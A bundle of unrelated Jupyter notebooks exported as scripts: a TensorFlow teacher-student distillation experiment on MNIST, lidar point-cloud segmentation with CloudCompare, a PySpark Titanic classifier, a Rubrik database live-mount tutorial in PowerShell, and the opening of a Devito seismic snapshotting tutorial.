# Calculate Loss (for both TRAIN and EVAL modes)
loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)
# Configure the Training Op (for TRAIN mode)
if mode == tf.estimator.ModeKeys.TRAIN:
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)
train_op = optimizer.minimize(
loss=loss,
global_step=tf.train.get_global_step())
return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)
# Add evaluation metrics (for EVAL mode)
eval_metric_ops = {
"accuracy": tf.metrics.accuracy(
labels=labels, predictions=predictions["classes"]),
}
return tf.estimator.EstimatorSpec(
mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)
# +
#cross entropy between two logits with temperature applied
#returns a 1d array with loss for each row in the inputs
def cross_entropy2(tar_soft_t, pred_logits):
pred_soft_t = tf.nn.softmax(pred_logits/temprature)
# tar_soft = tf.nn.softmax(tar_logits_t/temprature)
pred_log = -1 * tf.log(pred_soft_t)
product =tf.multiply(tar_soft_t,pred_log)
# print("Swapnil", pred_log,tar_soft_t,product)
return tf.reduce_mean(product)
def custom_loss(y_true, pred_logits, tar_soft_t):
# print(tf.losses.sparse_softmax_cross_entropy(labels = y_true, logits = pred_logits))
# print(l * cross_entropy2(tar_soft_t, pred_logits_t))
# return loss_weight * tf.losses.sparse_softmax_cross_entropy(labels = y_true, logits = pred_logits) + (1-loss_weight) * cross_entropy2(tar_soft_t, pred_logits_t)
return loss_weight * tf.losses.sparse_softmax_cross_entropy(labels = y_true, logits = pred_logits)+(1-loss_weight)*cross_entropy2(tar_soft_t,pred_logits)
# one_hot=tf.one_hot(y_true,10)
# sess2=tf.InteractiveSession()
# tf.train.start_queue_runners(sess2)
# print("S_",tar_soft_t.eval())
# print("T_",pred_soft_t.eval())
# sess2.close()
# return tf.losses.mean_squared_error(labels=tar_soft_t,predictions=pred_soft_t)
# +
def getFilterData(f,l):
sess=tf.InteractiveSession()
tf.train.start_queue_runners(sess)
data_s=f['x'].eval()
out_s=l.eval()
sess.close()
return data_s,out_s
def student_model_fn(features, labels, mode):
print(features,labels)
data_swap,out_swap=getFilterData(features,labels)
# Input Layer
# Reshape X to 4-D tensor: [batch_size, width, height, channels]
# MNIST images are 28x28 pixels, and have one color channel
input_layer = tf.reshape(features["x"], [-1, 28, 28, 1])
# Convolutional Layer #1
# Computes 32 features using a 5x5 filter with ReLU activation.
# Padding is added to preserve width and height.
# Input Tensor Shape: [batch_size, 28, 28, 1]
# Output Tensor Shape: [batch_size, 28, 28, 32]
if mode == tf.estimator.ModeKeys.TRAIN:
eval_teacher_fn = tf.estimator.inputs.numpy_input_fn(
x={"x":data_swap},
y=out_swap,
batch_size=100,
shuffle=False)
eval_teacher=mnist_classifier.evaluate(input_fn=eval_teacher_fn)
outlog.write('%f;' % eval_teacher['accuracy'])
outlog.write('%f;' % eval_teacher['loss'])
outlog.write('\n')
predictions=mnist_classifier.predict(input_fn=eval_teacher_fn)
teacher_pred=list(predictions)
teacher_soft=[ p['probabilities'] for p in teacher_pred]
temp=np.array(teacher_soft)
teacher_soft_t=tf.convert_to_tensor(temp)
conv1 = tf.layers.conv2d(
inputs=input_layer,
filters=8,
kernel_size=[5, 5],
padding="same",
activation=tf.nn.relu)
# Pooling Layer #1
# First max pooling layer with a 2x2 filter and stride of 2
# Input Tensor Shape: [batch_size, 28, 28, 32]
# Output Tensor Shape: [batch_size, 14, 14, 32]
pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2)
# Convolutional Layer #2
# Computes 64 features using a 5x5 filter.
# Padding is added to preserve width and height.
# Input Tensor Shape: [batch_size, 14, 14, 32]
# Output Tensor Shape: [batch_size, 14, 14, 64]
conv2 = tf.layers.conv2d(
inputs=pool1,
filters=8,
kernel_size=[5, 5],
padding="same",
activation=tf.nn.relu)
# Pooling Layer #2
# Second max pooling layer with a 2x2 filter and stride of 2
# Input Tensor Shape: [batch_size, 14, 14, 64]
# Output Tensor Shape: [batch_size, 7, 7, 64]
pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)
# Flatten tensor into a batch of vectors
# Input Tensor Shape: [batch_size, 7, 7, 64]
# Output Tensor Shape: [batch_size, 7 * 7 * 64]
pool2_flat = tf.reshape(pool2, [-1, 7 * 7 * 8])
# Dense Layer
# Densely connected layer with 1024 neurons
# Input Tensor Shape: [batch_size, 7 * 7 * 64]
# Output Tensor Shape: [batch_size, 1024]
dense = tf.layers.dense(inputs=pool2_flat, units=256, activation=tf.nn.relu)
# Add dropout operation; 0.6 probability that element will be kept
dropout = tf.layers.dropout(
inputs=dense, rate=0.4, training=mode == tf.estimator.ModeKeys.TRAIN)
# Logits layer
# Input Tensor Shape: [batch_size, 1024]
# Output Tensor Shape: [batch_size, 10]
logits = tf.layers.dense(inputs=dropout, units=10)
predictions = {
# Generate predictions (for PREDICT and EVAL mode)
"classes": tf.argmax(input=logits, axis=1),
# Add `softmax_tensor` to the graph. It is used for PREDICT and by the
# `logging_hook`.
"probabilities": tf.nn.softmax(logits, name="softmax_tensor")
}
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)
# Calculate Loss (for both TRAIN and EVAL modes)
# loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)
# student_pred=predictions['probabilities']
# sess1=tf.InteractiveSession()
# tf.train.start_queue_runners(sess1)
# student_soft=student_pred.eval()
# sess1.close()
if mode == tf.estimator.ModeKeys.TRAIN:
# pred_soft_t=tf.nn.softmax(logits, name="softmax_tensor")
# print('a',labels,'b', logits,'c', teacher_soft_t ,'d', pred_logits_t)
loss=custom_loss(labels, logits,teacher_soft_t)
else:
loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)
# Configure the Training Op (for TRAIN mode)
if mode == tf.estimator.ModeKeys.TRAIN:
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)
train_op = optimizer.minimize(
loss=loss,
global_step=tf.train.get_global_step())
return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)
# Add evaluation metrics (for EVAL mode)
eval_metric_ops = {
"accuracy": tf.metrics.accuracy(
labels=labels, predictions=predictions["classes"]),
}
return tf.estimator.EstimatorSpec(
mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)
# +
mnist_classifier = tf.estimator.Estimator(
model_fn=cnn_model_fn, model_dir="./models/mnist_convnet_model_test1")
mnist = tf.contrib.learn.datasets.load_dataset("mnist")
train_data = mnist.train.images # Returns np.array
train_labels = np.asarray(mnist.train.labels, dtype=np.int32)
eval_data = mnist.test.images # Returns np.array
eval_labels = np.asarray(mnist.test.labels, dtype=np.int32)
temp_list=[1,2,5,10]
loss_weight_list=[0,0.25,0.5,0.75,1]
p=-1
l=-1
def getdatap():
global p
p += 1
if p>len(train_labels)/100:
p=0
data=train_data[p*100:(p+1)*100]
labels=train_labels[p*100:(p+1)*100]
datatensor=tf.convert_to_tensor(data)
labeltensor=tf.convert_to_tensor(labels)
return {'x':datatensor},labeltensor
out = open('swapout4.csv', 'w')
outlog = open('out_log.csv', 'w')
for i in temp_list:
for j in loss_weight_list:
temprature=i
loss_weight=j
# Create the Estimator
student_classifier = tf.estimator.Estimator(
model_fn=student_model_fn, model_dir="./models/mnist_convnet_student_mod_t_"+str(i)+"_w_"+str(j))
# eval_train_fn = tf.estimator.inputs.numpy_input_fn(
# x={"x": train_data[:100]},
# y=train_labels[:100],
# num_epochs=1,
# batch_size=100,
# shuffle=False)
# train_result=mnist_classifier.evaluate(input_fn=eval_train_fn)
# #print("\n \n \n Train 100",train_result)
# print("\n\n\nLABEL FUNCTION",train_labels[:100])
# print("\n\n\nTRAIN DATA FUNCTION",train_data[0])
# Train the model
# train_input_fn = tf.estimator.inputs.numpy_input_fn(
# x={"x": train_data},
# y=train_labels,
# batch_size=100,
# num_epochs=None,
# shuffle=True)
# print(train_data,train_labels,eval_data,eval_labels)
student_classifier.train(
input_fn=getdatap,
steps=5000,
hooks=None)
# print("eva",type(eval_data))
# Evaluate the model and print results
eval_train_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": train_data},
y=train_labels,
shuffle=False)
train_result=student_classifier.evaluate(input_fn=eval_train_fn)
out.write('%f;' % i)
out.write('%f;' % j)
out.write('%f;' % train_result['accuracy'])
out.write('%f;' % train_result['loss'])
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": eval_data},
y=eval_labels,
num_epochs=1,
shuffle=False)
eval_result=student_classifier.evaluate(input_fn=eval_input_fn)
# output=list(predictions)
out.write('%f;' % eval_result['accuracy'])
out.write('%f;' % eval_result['loss'])
# acc=eval_result
# out.write(eval_result)
out.write('\n')
out.close()
outlog.close()
# -
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": eval_data},
y=eval_labels,
shuffle=False)
eval_result=student_classifier.evaluate(input_fn=eval_input_fn)
# # loss1 + lamba * loss2
# +
def custom_loss(y_true, pred_logits, tar_soft_t, pred_logits_t):
# print(tf.losses.sparse_softmax_cross_entropy(labels = y_true, logits = pred_logits))
# print(l * cross_entropy2(tar_soft_t, pred_logits_t))
return tf.losses.sparse_softmax_cross_entropy(labels = y_true, logits = pred_logits) + lam * cross_entropy2(tar_soft_t, pred_logits_t)
mnist_classifier = tf.estimator.Estimator(
model_fn=cnn_model_fn, model_dir="./models/mnist_convnet_model_test1")
mnist = tf.contrib.learn.datasets.load_dataset("mnist")
train_data = mnist.train.images # Returns np.array
train_labels = np.asarray(mnist.train.labels, dtype=np.int32)
eval_data = mnist.test.images # Returns np.array
eval_labels = np.asarray(mnist.test.labels, dtype=np.int32)
lam_list=[0,1,2,4,6,8,9,10]
temprature=2
out = open('out_lam.csv', 'w')
for i in lam_list:
lam=i
# Create the Estimator
student_classifier = tf.estimator.Estimator(
model_fn=student_model_fn, model_dir="./models/mnist_convnet_student_t_"+str(2)+"_lam_"+str(i))
# Train the model
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": train_data},
y=train_labels,
batch_size=100,
num_epochs=None,
shuffle=True)
print(train_data,train_labels,eval_data,eval_labels)
student_classifier.train(
input_fn=train_input_fn,
steps=20000,
hooks=None)
# print("eva",type(eval_data))
# Evaluate the model and print results
eval_train_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": train_data},
y=train_labels,
num_epochs=1,
shuffle=False)
train_result=student_classifier.evaluate(input_fn=eval_train_fn)
out.write('%f;' % i)
out.write('%f;' % j)
out.write('%f;' % train_result['accuracy'])
out.write('%f;' % train_result['loss'])
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": eval_data},
y=eval_labels,
num_epochs=1,
shuffle=False)
eval_result=student_classifier.evaluate(input_fn=eval_input_fn)
# output=list(predictions)
out.write('%f;' % eval_result['accuracy'])
out.write('%f;' % eval_result['loss'])
# acc=eval_result
# out.write(eval_result)
out.write('\n')
out.close()
# -
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": train_data},
y=train_labels,
batch_size=100,
num_epochs=10,
shuffle=False)
eval_result=mnist_classifier.evaluate(input_fn=eval_input_fn)
|
One_Student_Temp_Loss_Weight.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
for i in range(0,len(Extraction_folder)):
# Export clouds in .asc
commande = cc.open_file(commande1,shift,workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(Extraction_filenames.values())[i]+'.las')
cc.connected_component(commande,octree_level,min_point_per_component)
# Export clouds in .las
commande = cc.open_file(commande0,shift,workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(Extraction_filenames.values())[i]+'.las')
cc.connected_component(commande,octree_level,min_point_per_component)
# Count the number of segmented clouds
number_of_outputs = int(sum(len(files) for _, _, files in os.walk(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]))/2)
# Rename the segmented cloud in function of their number
for ii in range(1,number_of_outputs+1):
os.rename(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(Extraction_filenames.values())[i]+'_COMPONENT_'+str(ii)+'.asc',workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+str(ii-1)+'.csv')
os.rename(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(Extraction_filenames.values())[i]+'_COMPONENT_'+str(ii)+'.las',workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+str(ii-1)+'.las')
# Sort them from the biggest to the smallest
nb_points = []
for iii in range(0,number_of_outputs):
file=pd.read_csv(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+str(iii)+'.csv',sep=' ',header=None)
nb_points = np.append(nb_points,file.shape[0])
dataframe = pd.DataFrame({'Points':nb_points,})
dataframe= dataframe.sort_values(by=['Points'],ascending=False)
index_values=dataframe.index.values
# Create individual clouds folder
individual_clouds_folder = workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_folder.values())[i]
os.makedirs(individual_clouds_folder)
count = 0
for iii in index_values:
os.rename(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+str(iii)+'.las',workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_folder.values())[i]+str(count)+'.las')
count = count + 1
for iv in range(0,number_of_outputs):
os.remove(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+str(iv)+'.csv')
# #### #2 Segmentation by connected components
# Parameters
octree_level = 11
min_point_per_component = 20
commande1 = 'CloudCompare -SILENT -C_EXPORT_FMT BIN -AUTO_SAVE off -NO_TIMESTAMP'
individual_outputs_filenames = {'Sources':'individual_sources','Deposits':'individual_deposits'}
for i in range(0,len(Extraction_folder)):
# Create individual clouds and store the result in a .bin file
commande = cc.open_file(commande1,shift,workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(Extraction_filenames.values())[i]+'.las')
cc.connected_component(commande,octree_level,min_point_per_component)
os.rename(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+'AllClouds.bin',workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_filenames.values())[i]+'.bin')
# Merge all individual clouds
commande = cc.open_file(commande0,shift,workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_filenames.values())[i]+'.bin')
cc.merge_clouds(commande)
os.rename(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_filenames.values())[i]+'_MERGED_0.las',workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_filenames.values())[i]+'_merged.las')
for i in range(0,len(Extraction_folder)):
df=pd.read_csv(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_filenames.values())[i]+'_merged.asc',sep=',',header=0)
df = df.add_suffix('_3D')
df.to_csv(list(Extraction_folder.values())[i]+list(individual_outputs_filenames.values())[0]+'_merged.asc',sep=',',header=True,index=False)
# Here, you have to open the individual clouds ".bin" file in Cloudcompare to merge all the files and keep the index of all individual clouds. You can save the result in ".asc" and keep the columns title.
# IMPORTANT: The cloud number #5590 has been removed in this study as it has been identified as resulting from a flight line imperfect alignement.
# Now, we will add the suffixe "_3D" at all scalar fields name to keep them during the Volume estimation workflow.
# ### #2 Volume estimation
# Compute Vertical-M3C2
params_file = 'Vertical_m3c2_params.txt'
filenames_Vm3C2 = {'pre_EQ_lidar':'LiDAR_2014', 'post_EQ_lidar':'LiDAR_2016_registered'}
osf.open_folder(workspace+workflow_folder)
for i in range(0,len(Extraction_folder)):
commande = cc.open_file(cc.open_file(cc.open_file(commande0,shift,workspace+Data_folder+filenames['pre_EQ_lidar']+'.laz'),shift,workspace+Data_folder+filenames['post_EQ_lidar']+'.laz'),shift,workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_filenames.values())[i]+'_merged.asc')
cc.m3c2(commande,params_file,workspace,Data_folder,filenames_Vm3C2)
os.rename(workspace+Data_folder+list(filenames.values())[0]+'_M3C2.las',workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+'Vertical_M3C2.las')
number_of_outputs= {'Sources':1413,'Deposits':772}
individual_outputs_folder = {'Sources':'individual_sources/','Deposits':'individual_deposits/'}
# Extract all individual source and deposits from the scalar field 'Original cloud index'
for i in range(0,len(Extraction_folder)):
osf.open_folder(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_folder.values())[i])
commande = cc.open_file(commande0,shift,workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+'Vertical_M3C2.las')
for ii in range(0,list(number_of_outputs.values())[i]):
cc.filter_SF(commande,indexSF=7,min=ii,max=ii)
os.rename(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+'Vertical_M3C2_FILTERED_['+str(ii)+'_'+str(ii)+'].las',workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_folder.values())[i]+'Cloud_'+str(ii)+'.las')
|
scripts/.ipynb_checkpoints/brouillon-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Word2vec
#
# In this notebook, I use word2vec to train distributed representations.
import gensim
import pandas as pd
# ## Phonological
with open('../../data/training/phonological/english.txt') as f:
training_corpus =
|
semrep/models/word2vec/word2vec.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from __future__ import print_function, division
import time
import os
import sys
import csv
from numpy import array
# +
spark_home = os.environ['SPARK_HOME']
sys.path.insert(0, os.path.join(spark_home, 'python'))
sys.path.insert(0, os.path.join(spark_home, 'python/lib/py4j-0.10.4-src.zip'))
from pyspark.sql import SparkSession
spark = SparkSession.builder.master("local") \
.appName("test") \
.enableHiveSupport() \
.getOrCreate()
sc = spark.sparkContext
# -
# ## Data
# https://www.kaggle.com/c/titanic/data
# !hadoop fs -put ../data/titanic* /data/
df_train = spark.read.csv("/data/titanic_train.csv", header=True)
df_test = spark.read.csv("/data/titanic_test.csv", header=True)
df_train.count()
df_test.count()
df_train
df_train.show()
df_train.printSchema()
# +
from pyspark.sql.functions import lit, col
df_train = df_train.withColumn('Mark',lit('train'))
df_test = (df_test.withColumn('Survived',lit(0))
.withColumn('Mark',lit('test')))
df_test = df_test[df_train.columns]
## Append Test data to Train data
df = df_train.unionAll(df_test)
# -
df
# Convert Age, SibSp, Parch, Fare to Numeric
df = (df.withColumn('Age',df['Age'].cast("double"))
.withColumn('SibSp',df['SibSp'].cast("double"))
.withColumn('Parch',df['Parch'].cast("double"))
.withColumn('Fare',df['Fare'].cast("double"))
.withColumn('Survived',df['Survived'].cast("double"))
)
df.printSchema()
df.count()
df.groupBy('mark').count().show()
# ## Impute missing Age and Fare with the Average
# +
numVars = ['Survived','Age','SibSp','Parch','Fare']
def countNull(df, var):
return df.where(df[var].isNull()).count()
missing = {var: countNull(df,var) for var in numVars}
# -
missing
age_mean = df.groupBy().mean('Age').first()[0]
fare_mean = df.groupBy().mean('Fare').first()[0]
df = df.na.fill({'Age':age_mean,'Fare':fare_mean, 'Parch':0, 'Sex':'male', 'Embarked': 'S'})
# +
missing = {var: countNull(df, var) for var in numVars}
missing
# +
## Impute missing Embark
df = df.na.fill({'Embarked': 'S'})
# -
df.show()
# # Extract Title from Name
# +
from pyspark.sql.functions import udf
from pyspark.sql.types import StringType
## created user defined function to extract title
getTitle = udf(lambda name: name.split('.')[0].strip(),StringType())
df = df.withColumn('Title', getTitle(df['Name']))
df.select('Name','Title').show(3)
# -
# ## Index categorical variable
df.select('Sex').show()
## index Sex variable
from pyspark.ml.feature import StringIndexer
si = StringIndexer(inputCol = 'Sex', outputCol = 'Sex_indexed')
df_indexed = si.fit(df).transform(df).drop('Sex').withColumnRenamed('Sex_indexed','Sex')
df_indexed.select('Sex').show(5)
# +
## make use of pipeline to index all categorical variables
catVars = ['Pclass','Sex','Embarked','Title']
## make use of pipeline to index all categorical variables
def indexer(df,col):
si = StringIndexer(inputCol = col, outputCol = col+'_indexed').fit(df)
return si
indexers = [indexer(df,col) for col in catVars]
from pyspark.ml import Pipeline
pipeline = Pipeline(stages = indexers)
df_indexed = pipeline.fit(df).transform(df)
df_indexed.select('Embarked','Embarked_indexed').show(3)
# -
# ## Convert to label/features format
catVarsIndexed = [i+'_indexed' for i in catVars]
featuresCol = numVars+catVarsIndexed
featuresCol.remove('Survived')
labelCol = ['Mark','Survived']
# +
from pyspark.sql import Row
from pyspark.ml.linalg import Vectors
row = Row('mark','label','features')
df_indexed = df_indexed[labelCol+featuresCol]
# +
# 0-mark, 1-label, 2-features
# map features to DenseVector
lf = df_indexed.rdd.map(lambda r: (row(r[0], r[1], Vectors.dense(r[2:])))).toDF()
# index label
lf.show(3)
# -
# convert numeric label to categorical, which is required by
# decisionTree and randomForest
lf = StringIndexer(inputCol = 'label',outputCol='index').fit(lf).transform(lf)
lf.show()
lf.groupBy('mark').count().show()
# +
train = lf.where(lf.mark =='train')
test = lf.where(lf.mark =='test')
# random split further to get train/validate
train,validate = train.randomSplit([0.7,0.3],seed =121)
# -
print('Train Data Number of Row: '+ str(train.count()))
print('Validate Data Number of Row: '+ str(validate.count()))
print('Test Data Number of Row: '+ str(test.count()))
train.select('index','features').rdd.take(5)
# # Apply Models from ML/MLLIB
# ## Logistic Regression
# +
from pyspark.ml.classification import LogisticRegression
# regPara: lasso regularisation parameter (L1)
lr = LogisticRegression(maxIter = 100, regParam = 0.05, labelCol='index').fit(train.select('index','features'))
# Evaluate model based on auc ROC(default for binary classification)
from pyspark.ml.evaluation import BinaryClassificationEvaluator
def testModel(model, validate = validate):
pred = model.transform(validate)
evaluator = BinaryClassificationEvaluator(labelCol = 'index')
return evaluator.evaluate(pred)
print ('AUC ROC of Logistic Regression model is: '+str(testModel(lr)))
# +
from pyspark.ml.classification import DecisionTreeClassifier, RandomForestClassifier
dt = DecisionTreeClassifier(maxDepth = 10, labelCol ='index').fit(train)
rf = RandomForestClassifier(numTrees = 10, labelCol = 'index').fit(train)
# +
models = {'LogisticRegression':lr,
'DecistionTree':dt,
'RandomForest':rf}
modelPerf = {k:testModel(v) for k,v in models.items()}
# -
modelPerf
|
spark_ml/3_data_cleaning_titanic_example.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .ps1
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: PowerShell
# name: powershell
# ---
# + [markdown] azdata_cell_guid="bf436523-0fd6-423d-88b7-9f346d226a93"
# # Live Mount a database
# Live mount allows for near instant recovery of a database. If a database restore/export normally takes hours, then live mounting a database will take a few minutes. Live Mount does a full recovery of a database to either the same SQL Server Instance with a different database name or another SQL Server Instance with the same or different database name. The recovery of the database is much faster, because Rubrik does not need to copy the contents of the backup from the Rubrik Cluster back to the SQL Server. All of the recovery work is done on the Rubrik cluster itself. Then the database files are presented to the SQL Server Instance via a secure SMB3 share that is only accessible by the machine the share is mounted to.
#
# Live Mounting a database is great for a lot of different use cases:
# - Object level recovery
# - Developer testing
# - DevOps Automation
# - Reporting databases
# - DBA Backup validation testing
# - Database migration application smoke test validation.
#
# A key parameter is RecoveryDateTime. All dates in Rubrik are stored in UTC format. This parameter is expecting a fully qualified date and time in UTC format. example value is 2018-08-01T02:00:00.000Z. In the example below, we are pulling the latest recovery point that Rubrik knows about.
#
# ## Mount a database to a SQL Server
# ```ps
# $TargetSQLServerInstance = "am1-sql16-1"
# $LiveMountName = "Forward_LiveMount"
# $TargetInstance = Get-RubrikSQLInstance -ServerInstance $TargetSQLServerInstance
# $RubrikRequest = New-RubrikDatabaseMount -id $RubrikDatabase.id `
# -TargetInstanceId $TargetInstance.id `
# -MountedDatabaseName $LiveMountName `
# -recoveryDateTime (Get-date (Get-RubrikDatabase -id $RubrikDatabase.id).latestRecoveryPoint) `
# -Confirm:$false
# Get-RubrikRequest -id $RubrikRequest.id -Type mssql -WaitForCompletion
# ```
#
# ## Unmount a database from SQL Server
# ```ps
# $RubrikDatabaseMount = Get-RubrikDatabaseMount -MountedDatabaseName $LiveMountName -TargetInstanceId $TargetInstance.id
# $RubrikRequest = Remove-RubrikDatabaseMount -id $RubrikDatabaseMount.id -Confirm:$false
# ```
# ## Advanced Examples
# For a more advanced example of a taking a backup of databases with Rubrik, see the below script available on our [Github Repo](https://github.com/rubrikinc/rubrik-scripts-for-powershell)
# [mass-livemount.ps1](https://github.com/rubrikinc/rubrik-scripts-for-powershell/blob/master/MSSQL/mass-livemount.ps1)
# [invoke-MassLiveMount.ps1](https://github.com/rubrikinc/rubrik-scripts-for-powershell/blob/master/MSSQL/invoke-MassLiveMount.ps1)
# [invoke-MassUnMount.ps1](https://github.com/rubrikinc/rubrik-scripts-for-powershell/blob/master/MSSQL/invoke-MassUnMount.ps1)
#
# + azdata_cell_guid="99d472e3-b512-4f00-b00c-78a44135961a" tags=[]
#Connect-Rubrik with an API Token
$Server = "amer1-rbk01.rubrikdemo.com"
$Token = "<KEY>"
Connect-Rubrik -Server $Server -Token $Token
# Get database information from Rubrik
$SourceSQLServerInstance = "am1-sql16-1"
$SourceDatabaseName = "AdventureWorks2016"
$RubrikDatabase = Get-RubrikDatabase -Name $SourceDatabaseName -ServerInstance $SourceSQLServerInstance
# + azdata_cell_guid="37735469-0d73-4630-9b7a-ece95a74a395" tags=[]
#Mount a database to a SQL Server
$TargetSQLServerInstance = "am1-sql16-1"
$LiveMountName = "Forward_LiveMount"
$TargetInstance = Get-RubrikSQLInstance -ServerInstance $TargetSQLServerInstance
$RubrikRequest = New-RubrikDatabaseMount -id $RubrikDatabase.id `
-TargetInstanceId $TargetInstance.id `
-MountedDatabaseName $LiveMountName `
-recoveryDateTime (Get-date (Get-RubrikDatabase -id $RubrikDatabase.id).latestRecoveryPoint) `
-Confirm:$false
Get-RubrikRequest -id $RubrikRequest.id -Type mssql -WaitForCompletion
# + azdata_cell_guid="0e73695c-ccbe-4743-b25c-65f11505b505" tags=[]
#Unmount a database from SQL Server
$RubrikDatabaseMount = Get-RubrikDatabaseMount -MountedDatabaseName $LiveMountName -TargetInstanceId $TargetInstance.id
$RubrikRequest = Remove-RubrikDatabaseMount -id $RubrikDatabaseMount.id -Confirm:$false
|
content/10_LiveMountADatabase.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Snapshotting with Devito using the `ConditionalDimension`
#
# This notebook intends to introduce new Devito users (especially with a C or FORTRAN background) to the best practice on saving snapshots to disk, as a binary float file.
#
# We start by presenting a naive approach, and then introduce a more efficient method, which exploits Devito's `ConditionalDimension`.
# # Initialize utilities
#NBVAL_IGNORE_OUTPUT
# %reset -f
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
# # Problem Setup
# This tutorial is based on an example that has appeared in a [TLE tutorial](https://github.com/devitocodes/devito/blob/master/examples/seismic/tutorials/01_modelling.ipynb)(Louboutin et. al., 2017), in which one shot is modeled over a 2-layer velocity model.
# +
# This cell sets up the problem that is already explained in the first TLE tutorial.
#NBVAL_IGNORE_OUTPUT
# #%%flake8
from examples.seismic import Receiver
from examples.seismic import RickerSource
from examples.seismic import Model, plot_velocity, TimeAxis
from devito import TimeFunction
from devito import Eq, solve
from devito import Operator
# Set velocity model
nx = 201
nz = 201
nb = 10
shape = (nx, nz)
spacing = (20., 20.)
origin = (0., 0.)
v = np.empty(shape, dtype=np.float32)
v[:, :int(nx/2)] = 2.0
v[:, int(nx/2):] = 2.5
model = Model(vp=v, origin=origin, shape=shape, spacing=spacing,
space_order=2, nbl=10)
# Set time range, source, source coordinates and receiver coordinates
t0 = 0. # Simulation starts a t=0
tn = 10000. # Simulation lasts tn milliseconds
dt = model.critical_dt # Time step from model grid spacing
time_range = TimeAxis(start=t0, stop=tn, step=dt)
nt = time_range.num # number of time steps
f0 = 0.010 # Source peak frequency is 10Hz (0.010 kHz)
src = RickerSource(
name='src',
grid=model.grid,
f0=f0,
time_range=time_range)
src.coordinates.data[0, :] = np.array(model.domain_size) * .5
src.coordinates.data[0, -1] = 20. # Depth is 20m
rec = Receiver(
name='rec',
grid=model.grid,
npoint=101,
time_range=time_range) # new
rec.coordinates.data[:, 0] = np.linspace(0, model.domain_size[0], num=101)
rec.coordinates.data[:, 1] = 20. # Depth is 20m
depth = rec.coordinates.data[:, 1] # Depth is 20m
plot_velocity(model, source=src.coordinates.data,
receiver=rec.coordinates.data[::4, :])
#Used for reshaping
vnx = nx+20
vnz = nz+20
# Set symbolics for the wavefield object `u`, setting save on all time steps
# (which can occupy a lot of memory), to later collect snapshots (naive method):
u = TimeFunction(name="u", grid=model.grid, time_order=2,
space_order=2, save=time_range.num)
# Set symbolics of the operator, source and receivers:
pde = model.m * u.dt2 - u.laplace + model.damp * u.dt
stencil = Eq(u.forward, solve(pde, u.forward))
src_term = src.inject(field=u.forward, expr=src * dt**2 / model.m,
offset=model.nbl)
rec_term = rec.interpolate(expr=u, offset=model.nbl)
op = Operator([stencil] + src_term + rec_term, subs=model.spacing_map)
# Run the operator for `(nt-2)` time steps:
op(time=nt-2, dt=model.critical_dt)
# -
# # Saving snaps to disk - naive approach
#
